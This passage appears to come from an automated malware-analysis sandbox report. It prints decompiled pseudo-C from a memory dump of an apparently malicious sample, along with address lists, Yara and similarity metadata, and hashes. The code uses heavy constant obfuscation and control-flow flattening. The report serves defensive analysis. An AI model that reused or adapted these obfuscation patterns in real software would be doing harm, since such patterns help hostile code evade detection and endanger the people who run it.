                                                      				signed int _v552;
                                                      				signed int _v556;
                                                      				signed int _v560;
                                                      				signed int _v564;
                                                      				signed int _v568;
                                                      				signed int _v572;
                                                      				signed int _v576;
                                                      				signed int _v580;
                                                      				signed int _v584;
                                                      				signed int _v588;
                                                      				signed int _v592;
                                                      				signed int _v596;
                                                      				signed int _v600;
                                                      				signed int _v604;
                                                      				signed int _v608;
                                                      				signed int _v612;
                                                      				signed int _v616;
                                                      				signed int _v620;
                                                      				signed int _v624;
                                                      				signed int _v628;
                                                      				signed int _v632;
                                                      				signed int _v636;
                                                      				unsigned int _v640;
                                                      				signed int _v644;
                                                      				signed int _v648;
                                                      				signed int _v652;
                                                      				signed int _v656;
                                                      				signed int _v660;
                                                      				signed int _v664;
                                                      				signed int _v668;
                                                      				signed int _v672;
                                                      				signed int _v676;
                                                      				signed int _v680;
                                                      				signed int _v684;
                                                      				void* _t354;
                                                      				intOrPtr _t355;
                                                      				intOrPtr _t359;
                                                      				void* _t362;
                                                      				void* _t367;
                                                      				void* _t378;
                                                      				intOrPtr _t383;
                                                      				signed int _t386;
                                                      				signed int _t387;
                                                      				signed int _t388;
                                                      				signed int _t389;
                                                      				signed int _t390;
                                                      				signed int _t391;
                                                      				signed int _t392;
                                                      				signed int _t393;
                                                      				void* _t394;
                                                      				void* _t395;
                                                      				signed int _t401;
                                                      				signed int _t435;
                                                      				intOrPtr _t444;
                                                      				signed int _t445;
                                                      				intOrPtr _t449;
                                                      				signed int* _t450;
                                                      				void* _t452;
                                                      
                                                      				_t450 =  &_v684;
                                                      				_v548 = _v548 & 0x00000000;
                                                      				_v652 = 0x628b;
                                                      				_v652 = _v652 | 0x8ea8a6c3;
                                                      				_v652 = _v652 >> 8;
                                                      				_v652 = _v652 ^ 0x078a89dd;
                                                      				_v652 = _v652 ^ 0x0504213b;
                                                      				_v656 = 0xca44;
                                                      				_v656 = _v656 << 3;
                                                      				_v656 = _v656 >> 0xa;
                                                      				_v656 = _v656 | 0x073c6a17;
                                                      				_v656 = _v656 ^ 0x073c621f;
                                                      				_v664 = 0x16e0;
                                                      				_v664 = _v664 + 0xffffe980;
                                                      				_v664 = _v664 >> 8;
                                                      				_v544 = __edx;
                                                      				_t449 = __ecx;
                                                      				_t445 = 0x351028fa;
                                                      				_t386 = 0x6c;
                                                      				_v664 = _v664 / _t386;
                                                      				_v664 = _v664 ^ 0x00007066;
                                                      				_v640 = 0x836e;
                                                      				_v640 = _v640 + 0xb501;
                                                      				_v640 = _v640 >> 2;
                                                      				_v640 = _v640 ^ 0x000012b9;
                                                      				_v628 = 0xb2ec;
                                                      				_t387 = 0x41;
                                                      				_v628 = _v628 * 0x46;
                                                      				_v628 = _v628 + 0xd97;
                                                      				_v628 = _v628 ^ 0x0030acaf;
                                                      				_v576 = 0x565d;
                                                      				_v576 = _v576 | 0xc8c85e8e;
                                                      				_v576 = _v576 ^ 0xc8c86b89;
                                                      				_v560 = 0xfa05;
                                                      				_v560 = _v560 + 0x1743;
                                                      				_v560 = _v560 ^ 0x00015cb0;
                                                      				_v588 = 0x54a3;
                                                      				_v588 = _v588 ^ 0x711a4c60;
                                                      				_v588 = _v588 << 6;
                                                      				_v588 = _v588 ^ 0x46864cc2;
                                                      				_v596 = 0xba14;
                                                      				_v596 = _v596 + 0xf2e8;
                                                      				_v596 = _v596 + 0x1be7;
                                                      				_v596 = _v596 ^ 0x00019f0a;
                                                      				_v660 = 0x9a1f;
                                                      				_v660 = _v660 / _t387;
                                                      				_t388 = 0x56;
                                                      				_v660 = _v660 * 0x79;
                                                      				_v660 = _v660 << 0xd;
                                                      				_v660 = _v660 ^ 0x23dca07a;
                                                      				_v676 = 0x17dc;
                                                      				_v676 = _v676 << 0xe;
                                                      				_v676 = _v676 / _t388;
                                                      				_v676 = _v676 + 0xffffccb5;
                                                      				_v676 = _v676 ^ 0x0011ad2d;
                                                      				_v636 = 0xbd70;
                                                      				_v636 = _v636 | 0x80fc5ede;
                                                      				_v636 = _v636 << 4;
                                                      				_v636 = _v636 ^ 0x0fcfa70d;
                                                      				_v608 = 0xbaf8;
                                                      				_v608 = _v608 + 0xffff1119;
                                                      				_t389 = 0x27;
                                                      				_v608 = _v608 / _t389;
                                                      				_v608 = _v608 ^ 0x06904b29;
                                                      				_v684 = 0xf49f;
                                                      				_t390 = 0x66;
                                                      				_v684 = _v684 * 0x1f;
                                                      				_v684 = _v684 + 0xffffe502;
                                                      				_v684 = _v684 / _t390;
                                                      				_v684 = _v684 ^ 0x00005c32;
                                                      				_v668 = 0xe410;
                                                      				_v668 = _v668 >> 0xc;
                                                      				_v668 = _v668 + 0xffffc634;
                                                      				_v668 = _v668 << 0xf;
                                                      				_v668 = _v668 ^ 0xe3216c4d;
                                                      				_v620 = 0x7d49;
                                                      				_t391 = 0x24;
                                                      				_v620 = _v620 * 0x1a;
                                                      				_v620 = _v620 ^ 0x980c0cc6;
                                                      				_v620 = _v620 ^ 0x9800e7e7;
                                                      				_v564 = 0x5c7e;
                                                      				_v564 = _v564 ^ 0x14aa654c;
                                                      				_v564 = _v564 ^ 0x14aa562a;
                                                      				_v552 = 0x450c;
                                                      				_v552 = _v552 << 7;
                                                      				_v552 = _v552 ^ 0x0022b9f7;
                                                      				_v580 = 0x3573;
                                                      				_v580 = _v580 >> 0xe;
                                                      				_v580 = _v580 / _t391;
                                                      				_v580 = _v580 ^ 0x000007cd;
                                                      				_v584 = 0x18cc;
                                                      				_v584 = _v584 >> 0xe;
                                                      				_v584 = _v584 << 3;
                                                      				_v584 = _v584 ^ 0x000042dd;
                                                      				_v556 = 0x1e9b;
                                                      				_v556 = _v556 + 0xffff5daa;
                                                      				_v556 = _v556 ^ 0xffff6e35;
                                                      				_v568 = 0x1617;
                                                      				_v568 = _v568 << 4;
                                                      				_v568 = _v568 ^ 0x000112eb;
                                                      				_v572 = 0xca92;
                                                      				_v572 = _v572 + 0x7b62;
                                                      				_v572 = _v572 ^ 0x00017fbb;
                                                      				_v592 = 0xd72f;
                                                      				_v592 = _v592 | 0xe23ccaf6;
                                                      				_v592 = _v592 + 0x7d96;
                                                      				_v592 = _v592 ^ 0xe23d11e5;
                                                      				_v644 = 0x4340;
                                                      				_t392 = 7;
                                                      				_v644 = _v644 * 0x73;
                                                      				_v644 = _v644 | 0x11b8a473;
                                                      				_v644 = _v644 ^ 0x11bec66f;
                                                      				_v672 = 0x4860;
                                                      				_v672 = _v672 / _t392;
                                                      				_v672 = _v672 | 0x7c31fb12;
                                                      				_v672 = _v672 ^ 0x5cc3fc4f;
                                                      				_v672 = _v672 ^ 0x20f228b2;
                                                      				_v680 = 0x617d;
                                                      				_v680 = _v680 >> 0xd;
                                                      				_v680 = _v680 | 0xd7e9f895;
                                                      				_v680 = _v680 ^ 0xd7e9e095;
                                                      				_v616 = 0xec2d;
                                                      				_v616 = _v616 + 0xebc9;
                                                      				_v616 = _v616 ^ 0x6282d746;
                                                      				_v616 = _v616 ^ 0x6283789e;
                                                      				_v600 = 0x3147;
                                                      				_v600 = _v600 >> 0xe;
                                                      				_t393 = 0x4c;
                                                      				_t383 = _v544;
                                                      				_t444 = _v544;
                                                      				_v600 = _v600 * 0x6d;
                                                      				_v600 = _v600 ^ 0x000035af;
                                                      				_v604 = 0xdf1e;
                                                      				_v604 = _v604 >> 0xa;
                                                      				_v604 = _v604 + 0xffffe311;
                                                      				_v604 = _v604 ^ 0xffffd288;
                                                      				_v612 = 0xd6ea;
                                                      				_v612 = _v612 << 0xc;
                                                      				_v612 = _v612 * 0x1c;
                                                      				_v612 = _v612 ^ 0x7819f753;
                                                      				_v624 = 0x23;
                                                      				_v624 = _v624 >> 6;
                                                      				_v624 = _v624 ^ 0x0e47f934;
                                                      				_v624 = _v624 ^ 0x0e47f086;
                                                      				_v632 = 0x3384;
                                                      				_v632 = _v632 >> 9;
                                                      				_v632 = _v632 / _t393;
                                                      				_v632 = _v632 ^ 0x000059c8;
                                                      				_v648 = 0x4bab;
                                                      				_v648 = _v648 * 0x33;
                                                      				_v648 = _v648 ^ 0xea23b576;
                                                      				_v648 = _v648 | 0x057acb41;
                                                      				_v648 = _v648 ^ 0xef7effc2;
                                                      				while(1) {
                                                      					L1:
                                                      					_t354 = 0x2d3a08fe;
                                                      					while(1) {
                                                      						L2:
                                                      						_t394 = 0x2432fb60;
                                                      						do {
                                                      							while(1) {
                                                      								L3:
                                                      								_t452 = _t445 - _t394;
                                                      								if(_t452 > 0) {
                                                      									break;
                                                      								}
                                                      								if(_t452 == 0) {
                                                      									_push( &_v524);
                                                      									_push(_t394);
                                                      									_t367 = E0023BB3A(_v684, _v668, _t394, _v548, _v620,  &_v540, _v564);
                                                      									_t450 =  &(_t450[7]);
                                                      									if(_t367 != 0) {
                                                      										E00244F7D(_v552, _v580, _v540);
                                                      										E00244F7D(_v584, _v556, _v536);
                                                      									}
                                                      									_t435 = _v572;
                                                      									_push(_v548);
                                                      									_t401 = _v568;
                                                      									L21:
                                                      									E00244F7D(_t401, _t435);
                                                      									L22:
                                                      									_t445 = 0x2e38c466;
                                                      									while(1) {
                                                      										L1:
                                                      										_t354 = 0x2d3a08fe;
                                                      										goto L2;
                                                      									}
                                                      								} else {
                                                      									if(_t445 == 0xd57030c) {
                                                      										return E0023F536(_v624, _v632, _v648, _t444);
                                                      									}
                                                      									if(_t445 == 0x1b7bc3fb) {
                                                      										E0023F326();
                                                      										E0023F6DF(_t394);
                                                      										_t354 = 0x2d3a08fe;
                                                      										_t445 = 0x1f6584a2;
                                                      										_t383 =  !=  ? 0x2d3a08fe : 0x19ec5bc6;
                                                      										goto L2;
                                                      									} else {
                                                      										if(_t445 == 0x1f6584a2) {
                                                      											if(_t383 != _t354) {
                                                      												_t445 = 0x1fb1d4b9;
                                                      												continue;
                                                      											} else {
                                                      												_push(_v652);
                                                      												_push(_t394);
                                                      												_t287 =  &_v676; // 0xe3216c4d
                                                      												E002317AC(_v660,  &_v548,  *_t287, _t394);
                                                      												_t450 =  &(_t450[5]);
                                                      												asm("sbb esi, esi");
                                                      												_t445 = (_t445 & 0x125ad1ad) + 0xd57030c;
                                                      												while(1) {
                                                      													L1:
                                                      													_t354 = 0x2d3a08fe;
                                                      													L2:
                                                      													_t394 = 0x2432fb60;
                                                      													goto L3;
                                                      												}
                                                      											}
                                                      										} else {
                                                      											if(_t445 != 0x1fb1d4b9) {
                                                      												goto L31;
                                                      											} else {
                                                      												_push( &_v524);
                                                      												_push(0x24c910);
                                                      												_t378 = E002388E5(_t449, _v544);
                                                      												_t354 = 0x2d3a08fe;
                                                      												if(_t378 == 0) {
                                                      													if(_t383 == 0x2d3a08fe) {
                                                      														E00244F7D(_v636, _v608, _v548);
                                                      														_t354 = 0x2d3a08fe;
                                                      													}
                                                      													_t445 = 0xd57030c;
                                                      													while(1) {
                                                      														L2:
                                                      														_t394 = 0x2432fb60;
                                                      														goto L3;
                                                      													}
                                                      												} else {
                                                      													_t394 = 0x2432fb60;
                                                      													_t445 =  ==  ? 0x2432fb60 : 0x35df9137;
                                                      													continue;
                                                      												}
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      								L24:
                                                      								if(_t445 != 0x351028fa) {
                                                      									if(_t445 != 0x35df9137) {
                                                      										goto L31;
                                                      									} else {
                                                      										_push(_t394);
                                                      										_push(_v680);
                                                      										_push( &_v524);
                                                      										_t312 =  &_v672; // 0x7066
                                                      										_push( *_t312);
                                                      										_push( &_v540);
                                                      										_push(_v644);
                                                      										_push(0);
                                                      										_t362 = E0023568E(_v592, 0);
                                                      										_t450 =  &(_t450[7]);
                                                      										if(_t362 == 0) {
                                                      											goto L22;
                                                      										} else {
                                                      											E00244F7D(_v616, _v600, _v540);
                                                      											_t435 = _v612;
                                                      											_push(_v536);
                                                      											_t401 = _v604;
                                                      											goto L21;
                                                      										}
                                                      										goto L28;
                                                      									}
                                                      									L34:
                                                      									return _t359;
                                                      								}
                                                      								L28:
                                                      								_push(_t394);
                                                      								_push(_t394);
                                                      								_t395 = 0x38;
                                                      								_t359 = E00238736(_t395);
                                                      								_t444 = _t359;
                                                      								if(_t444 != 0) {
                                                      									_t445 = 0x1b7bc3fb;
                                                      									goto L1;
                                                      								}
                                                      								goto L34;
                                                      							}
                                                      							if(_t445 == 0x2e38c466) {
                                                      								 *((intOrPtr*)(_t444 + 0x24)) = _t449;
                                                      								_t445 = 0xbb47724;
                                                      								_t355 =  *0x24ca24; // 0x0
                                                      								 *((intOrPtr*)(_t444 + 0x2c)) = _t355;
                                                      								_t354 = 0x2d3a08fe;
                                                      								 *0x24ca24 = _t444;
                                                      								goto L31;
                                                      							}
                                                      							goto L24;
                                                      							L31:
                                                      						} while (_t445 != 0xbb47724);
                                                      						return _t354;
                                                      					}
                                                      				}
                                                      			}

                                                      0x002391a6
                                                      0x002391ae
                                                      0x002391b3
                                                      0x002391bb
                                                      0x002391c8
                                                      0x002391cb
                                                      0x002391cf
                                                      0x002391d7
                                                      0x002391df
                                                      0x002391ea
                                                      0x002391f5
                                                      0x00239200
                                                      0x0023920b
                                                      0x00239213
                                                      0x0023921e
                                                      0x00239226
                                                      0x00239233
                                                      0x00239237
                                                      0x0023923f
                                                      0x00239247
                                                      0x0023924c
                                                      0x00239251
                                                      0x00239259
                                                      0x00239264
                                                      0x0023926f
                                                      0x0023927a
                                                      0x00239285
                                                      0x0023928d
                                                      0x00239298
                                                      0x002392a3
                                                      0x002392ae
                                                      0x002392b9
                                                      0x002392c1
                                                      0x002392c9
                                                      0x002392d1
                                                      0x002392d9
                                                      0x002392e6
                                                      0x002392e7
                                                      0x002392eb
                                                      0x002392f3
                                                      0x002392fb
                                                      0x00239309
                                                      0x0023930d
                                                      0x00239315
                                                      0x0023931d
                                                      0x00239325
                                                      0x0023932d
                                                      0x00239332
                                                      0x0023933a
                                                      0x00239342
                                                      0x0023934a
                                                      0x00239352
                                                      0x0023935a
                                                      0x00239362
                                                      0x0023936a
                                                      0x00239378
                                                      0x00239379
                                                      0x00239380
                                                      0x00239387
                                                      0x0023938b
                                                      0x00239393
                                                      0x0023939b
                                                      0x002393a0
                                                      0x002393a8
                                                      0x002393b0
                                                      0x002393b8
                                                      0x002393c2
                                                      0x002393c6
                                                      0x002393ce
                                                      0x002393d6
                                                      0x002393db
                                                      0x002393e3
                                                      0x002393eb
                                                      0x002393f3
                                                      0x002393fe
                                                      0x00239402
                                                      0x0023940a
                                                      0x00239417
                                                      0x0023941b
                                                      0x00239423
                                                      0x0023942b
                                                      0x00239433
                                                      0x00239433
                                                      0x00239433
                                                      0x00239438
                                                      0x00239438
                                                      0x00239438
                                                      0x0023943d
                                                      0x0023943d
                                                      0x0023943d
                                                      0x0023943d
                                                      0x0023943f
                                                      0x00000000
                                                      0x00000000
                                                      0x00239445
                                                      0x0023955a
                                                      0x0023955b
                                                      0x0023957f
                                                      0x00239584
                                                      0x00239589
                                                      0x0023959d
                                                      0x002395b5
                                                      0x002395ba
                                                      0x002395bb
                                                      0x002395c2
                                                      0x002395c9
                                                      0x002395d0
                                                      0x002395d0
                                                      0x002395d6
                                                      0x002395d6
                                                      0x00239433
                                                      0x00239433
                                                      0x00239433
                                                      0x00000000
                                                      0x00239433
                                                      0x0023944b
                                                      0x00239451
                                                      0x00000000
                                                      0x002396c1
                                                      0x0023945d
                                                      0x0023952e
                                                      0x00239535
                                                      0x00239541
                                                      0x00239546
                                                      0x0023954b
                                                      0x00000000
                                                      0x00239463
                                                      0x00239469
                                                      0x002394d8
                                                      0x00239511
                                                      0x00000000
                                                      0x002394da
                                                      0x002394da
                                                      0x002394e5
                                                      0x002394e7
                                                      0x002394f4
                                                      0x002394f9
                                                      0x002394fe
                                                      0x00239506
                                                      0x00239433
                                                      0x00239433
                                                      0x00239433
                                                      0x00239438
                                                      0x00239438
                                                      0x00000000
                                                      0x00239438
                                                      0x00239433
                                                      0x0023946b
                                                      0x00239471
                                                      0x00000000
                                                      0x00239477
                                                      0x00239485
                                                      0x00239486
                                                      0x0023948d
                                                      0x00239495
                                                      0x0023949b
                                                      0x002394b0
                                                      0x002394c1
                                                      0x002394c7
                                                      0x002394c7
                                                      0x002394cc
                                                      0x00239438
                                                      0x00239438
                                                      0x00239438
                                                      0x00000000
                                                      0x00239438
                                                      0x0023949d
                                                      0x002394a4
                                                      0x002394a9
                                                      0x00000000
                                                      0x002394a9
                                                      0x0023949b
                                                      0x00239471
                                                      0x00239469
                                                      0x0023945d
                                                      0x002395ec
                                                      0x002395f2
                                                      0x002395fa
                                                      0x00000000
                                                      0x00239600
                                                      0x00239600
                                                      0x00239601
                                                      0x0023960e
                                                      0x0023960f
                                                      0x0023960f
                                                      0x0023961a
                                                      0x0023961b
                                                      0x00239626
                                                      0x00239628
                                                      0x0023962d
                                                      0x00239632
                                                      0x00000000
                                                      0x00239634
                                                      0x00239643
                                                      0x00239648
                                                      0x0023964d
                                                      0x00239654
                                                      0x00000000
                                                      0x00239654
                                                      0x00000000
                                                      0x00239632
                                                      0x002396cc
                                                      0x002396cc
                                                      0x002396cc
                                                      0x0023965d
                                                      0x00239669
                                                      0x0023966a
                                                      0x0023966d
                                                      0x0023966e
                                                      0x00239673
                                                      0x00239679
                                                      0x0023967b
                                                      0x00000000
                                                      0x0023967b
                                                      0x00000000
                                                      0x00239679
                                                      0x002395e6
                                                      0x00239685
                                                      0x00239688
                                                      0x0023968d
                                                      0x00239692
                                                      0x00239695
                                                      0x0023969a
                                                      0x00000000
                                                      0x0023969a
                                                      0x00000000
                                                      0x002396a0
                                                      0x002396a0
                                                      0x00000000
                                                      0x0023943d
                                                      0x00239438

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #$-$@C$G1$Ml!$]V$`H$b{$fpMl!$s5$}a$~\
                                                      • API String ID: 0-964951681
                                                      • Opcode ID: 1082b0791201f3e6eafba73c062f4e466b6a6fabc7ac911334da811be6ba858e
                                                      • Instruction ID: aba586bf59d0b92451ed2e30d7337aa23cfed29c4a8f1305e84f95a4b7d844e7
                                                      • Opcode Fuzzy Hash: 1082b0791201f3e6eafba73c062f4e466b6a6fabc7ac911334da811be6ba858e
                                                      • Instruction Fuzzy Hash: CD0251B250D3818FE368CF25D54AA4BFBE1BBC4708F50891DF199862A0D7B59949CF43
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 98%
                                                      			E0023E377() {
                                                      				intOrPtr _t319;
                                                      				intOrPtr _t322;
                                                      				void* _t325;
                                                      				intOrPtr _t326;
                                                      				intOrPtr _t327;
                                                      				intOrPtr _t329;
                                                      				void* _t336;
                                                      				intOrPtr* _t368;
                                                      				signed int _t371;
                                                      				signed int _t372;
                                                      				signed int _t373;
                                                      				void* _t374;
                                                      				intOrPtr* _t376;
                                                      				void* _t380;
                                                      
                                                      				 *(_t380 + 0x90) = 0x492ac5;
                                                      				 *(_t380 + 0x94) = 0;
                                                      				 *((intOrPtr*)(_t380 + 0x98)) = 0;
                                                      				_t336 = 0x262df760;
                                                      				 *(_t380 + 0x48) = 0xf735;
                                                      				 *(_t380 + 0x48) =  *(_t380 + 0x48) << 2;
                                                      				 *(_t380 + 0x48) =  *(_t380 + 0x48) | 0x892d06ba;
                                                      				 *(_t380 + 0x48) =  *(_t380 + 0x48) ^ 0x892fdeff;
                                                      				 *(_t380 + 4) = 0x4aa3;
                                                      				 *(_t380 + 4) =  *(_t380 + 4) >> 0xc;
                                                      				 *(_t380 + 4) =  *(_t380 + 4) | 0x950899f8;
                                                      				 *(_t380 + 4) =  *(_t380 + 4) << 4;
                                                      				 *(_t380 + 4) =  *(_t380 + 4) ^ 0x50899fc1;
                                                      				 *(_t380 + 0x34) = 0x5ec9;
                                                      				 *(_t380 + 0x8c) = 0;
                                                      				 *(_t380 + 0x44) =  *(_t380 + 0x34) * 0x1a;
                                                      				_t371 = 0x70;
                                                      				 *(_t380 + 0x48) =  *(_t380 + 0x44) * 0x3f;
                                                      				 *(_t380 + 0x48) =  *(_t380 + 0x48) ^ 0x025e429c;
                                                      				 *(_t380 + 0x60) = 0xe88e;
                                                      				 *(_t380 + 0x60) =  *(_t380 + 0x60) >> 5;
                                                      				 *(_t380 + 0x60) =  *(_t380 + 0x60) + 0xffff58a0;
                                                      				 *(_t380 + 0x60) =  *(_t380 + 0x60) ^ 0xffff02fa;
                                                      				 *(_t380 + 0x58) = 0xbd5e;
                                                      				 *(_t380 + 0x58) =  *(_t380 + 0x58) ^ 0xb084e46b;
                                                      				 *(_t380 + 0x58) =  *(_t380 + 0x58) >> 0xe;
                                                      				 *(_t380 + 0x58) =  *(_t380 + 0x58) ^ 0x0002e87c;
                                                      				 *(_t380 + 0x2c) = 0x606e;
                                                      				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) + 0xffff1c2d;
                                                      				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) + 0x108d;
                                                      				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) * 0x15;
                                                      				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) ^ 0xfff6a15c;
                                                      				 *(_t380 + 0x4c) = 0xb86a;
                                                      				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) + 0xd5ca;
                                                      				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) | 0x7ce26820;
                                                      				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) ^ 0x7ce3b1fe;
                                                      				 *(_t380 + 0x44) = 0x5cf7;
                                                      				 *(_t380 + 0x44) =  *(_t380 + 0x44) | 0x38977032;
                                                      				 *(_t380 + 0x44) =  *(_t380 + 0x44) * 0x30;
                                                      				 *(_t380 + 0x44) =  *(_t380 + 0x44) ^ 0x9c67384b;
                                                      				 *(_t380 + 0x74) = 0xd45b;
                                                      				 *(_t380 + 0x74) =  *(_t380 + 0x74) / _t371;
                                                      				 *(_t380 + 0x74) =  *(_t380 + 0x74) ^ 0x00004dc6;
                                                      				 *(_t380 + 0x14) = 0x87c2;
                                                      				 *(_t380 + 0x14) =  *(_t380 + 0x14) + 0xc44a;
                                                      				 *(_t380 + 0x14) =  *(_t380 + 0x14) ^ 0x3473056e;
                                                      				 *(_t380 + 0x14) =  *(_t380 + 0x14) ^ 0x529657aa;
                                                      				 *(_t380 + 0x14) =  *(_t380 + 0x14) ^ 0x66e43592;
                                                      				 *(_t380 + 0x6c) = 0x3ddc;
                                                      				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) >> 6;
                                                      				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) ^ 0x00003a4d;
                                                      				 *(_t380 + 0x3c) = 0xc186;
                                                      				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) + 0xffff2874;
                                                      				_t372 = 0x60;
                                                      				 *(_t380 + 0x38) =  *(_t380 + 0x3c) / _t372;
                                                      				 *(_t380 + 0x38) =  *(_t380 + 0x38) ^ 0x02aacd93;
                                                      				 *(_t380 + 0x94) = 0x420b;
                                                      				 *(_t380 + 0x94) =  *(_t380 + 0x94) + 0xffff81cc;
                                                      				 *(_t380 + 0x94) =  *(_t380 + 0x94) ^ 0xffffbf2e;
                                                      				 *(_t380 + 0x24) = 0x5d05;
                                                      				 *(_t380 + 0x24) =  *(_t380 + 0x24) << 7;
                                                      				 *(_t380 + 0x24) =  *(_t380 + 0x24) >> 0xf;
                                                      				 *(_t380 + 0x24) =  *(_t380 + 0x24) ^ 0x53344f8a;
                                                      				 *(_t380 + 0x24) =  *(_t380 + 0x24) ^ 0x53345d77;
                                                      				 *(_t380 + 0x78) = 0xceba;
                                                      				 *(_t380 + 0x78) =  *(_t380 + 0x78) >> 0x10;
                                                      				 *(_t380 + 0x78) =  *(_t380 + 0x78) ^ 0x00002af4;
                                                      				 *(_t380 + 0x1c) = 0x6278;
                                                      				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) << 0xa;
                                                      				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) ^ 0x09bc8c53;
                                                      				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) + 0xd5e;
                                                      				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) ^ 0x08353d86;
                                                      				 *(_t380 + 0x18) = 0x457c;
                                                      				 *(_t380 + 0x18) =  *(_t380 + 0x18) ^ 0x1123efff;
                                                      				 *(_t380 + 0x18) =  *(_t380 + 0x18) + 0x9050;
                                                      				 *(_t380 + 0x18) =  *(_t380 + 0x18) ^ 0x715c45c2;
                                                      				 *(_t380 + 0x18) =  *(_t380 + 0x18) ^ 0x607832f2;
                                                      				 *(_t380 + 0x4c) = 0x48c4;
                                                      				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) + 0x892d;
                                                      				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) ^ 0x18e86949;
                                                      				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) ^ 0x18e8d95b;
                                                      				 *(_t380 + 0x64) = 0xb936;
                                                      				 *(_t380 + 0x64) =  *(_t380 + 0x64) + 0xd883;
                                                      				 *(_t380 + 0x64) =  *(_t380 + 0x64) ^ 0x0001ac1b;
                                                      				 *(_t380 + 0x20) = 0xcbd2;
                                                      				_t373 = 0x7c;
                                                      				 *(_t380 + 0x20) =  *(_t380 + 0x20) * 0x1d;
                                                      				 *(_t380 + 0x20) =  *(_t380 + 0x20) / _t373;
                                                      				 *(_t380 + 0x20) =  *(_t380 + 0x20) | 0xfc977955;
                                                      				 *(_t380 + 0x20) =  *(_t380 + 0x20) ^ 0xfc977dd0;
                                                      				 *(_t380 + 0x6c) = 0x94d3;
                                                      				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) | 0xdadf67d0;
                                                      				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) ^ 0xdadfc8fb;
                                                      				 *(_t380 + 0x90) = 0xca42;
                                                      				 *(_t380 + 0x90) =  *(_t380 + 0x90) * 0x44;
                                                      				 *(_t380 + 0x90) =  *(_t380 + 0x90) ^ 0x0035a538;
                                                      				 *(_t380 + 0x3c) = 0x3a85;
                                                      				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) | 0x6827828e;
                                                      				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) >> 5;
                                                      				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) ^ 0x0341637e;
                                                      				 *(_t380 + 0x74) = 0xaf39;
                                                      				 *(_t380 + 0x74) =  *(_t380 + 0x74) << 0xb;
                                                      				 *(_t380 + 0x74) =  *(_t380 + 0x74) ^ 0x0579f034;
                                                      				 *(_t380 + 0x84) = 0x7bfe;
                                                      				 *(_t380 + 0x84) =  *(_t380 + 0x84) * 0x70;
                                                      				 *(_t380 + 0x84) =  *(_t380 + 0x84) ^ 0x0036086b;
                                                      				 *(_t380 + 0x88) = 0xbca6;
                                                      				 *(_t380 + 0x88) =  *(_t380 + 0x88) + 0xffffd080;
                                                      				 *(_t380 + 0x88) =  *(_t380 + 0x88) ^ 0x0000ec3f;
                                                      				 *(_t380 + 0x7c) = 0x7bcd;
                                                      				 *(_t380 + 0x7c) =  *(_t380 + 0x7c) >> 0xf;
                                                      				 *(_t380 + 0x7c) =  *(_t380 + 0x7c) ^ 0x00003bde;
                                                      				 *(_t380 + 0x8c) = 0x5f89;
                                                      				 *(_t380 + 0x8c) =  *(_t380 + 0x8c) + 0x6fee;
                                                      				 *(_t380 + 0x8c) =  *(_t380 + 0x8c) ^ 0x0000a333;
                                                      				 *(_t380 + 0x2c) = 0x86b9;
                                                      				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) + 0xffffbf3c;
                                                      				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) >> 5;
                                                      				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) >> 4;
                                                      				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) ^ 0x000073b3;
                                                      				 *(_t380 + 0x50) = 0x2126;
                                                      				 *(_t380 + 0x50) =  *(_t380 + 0x50) ^ 0x2e94f228;
                                                      				 *(_t380 + 0x50) =  *(_t380 + 0x50) >> 0xe;
                                                      				 *(_t380 + 0x50) =  *(_t380 + 0x50) ^ 0x00008d73;
                                                      				 *(_t380 + 0x80) = 0xf6ec;
                                                      				 *(_t380 + 0x80) =  *(_t380 + 0x80) * 0x34;
                                                      				 *(_t380 + 0x80) =  *(_t380 + 0x80) ^ 0x003277fb;
                                                      				 *(_t380 + 0x60) = 0x3ac6;
                                                      				 *(_t380 + 0x60) =  *(_t380 + 0x60) * 0x28;
                                                      				 *(_t380 + 0x60) =  *(_t380 + 0x60) | 0xd79c8d1c;
                                                      				 *(_t380 + 0x60) =  *(_t380 + 0x60) ^ 0xd79df08f;
                                                      				 *(_t380 + 0x30) = 0x4848;
                                                      				 *(_t380 + 0x30) =  *(_t380 + 0x30) ^ 0x9b476349;
                                                      				 *(_t380 + 0x30) =  *(_t380 + 0x30) ^ 0x919ac53c;
                                                      				 *(_t380 + 0x30) =  *(_t380 + 0x30) ^ 0x0adda027;
                                                      				 *(_t380 + 0x34) = 0xf09c;
                                                      				 *(_t380 + 0x34) =  *(_t380 + 0x34) << 0xc;
                                                      				_t374 = 0x28650a76;
                                                      				_t368 =  *((intOrPtr*)(_t380 + 0x98));
                                                      				_t334 =  *((intOrPtr*)(_t380 + 0x98));
                                                      				_t378 =  *((intOrPtr*)(_t380 + 0x98));
                                                      				 *(_t380 + 0x34) =  *(_t380 + 0x34) * 0x3e;
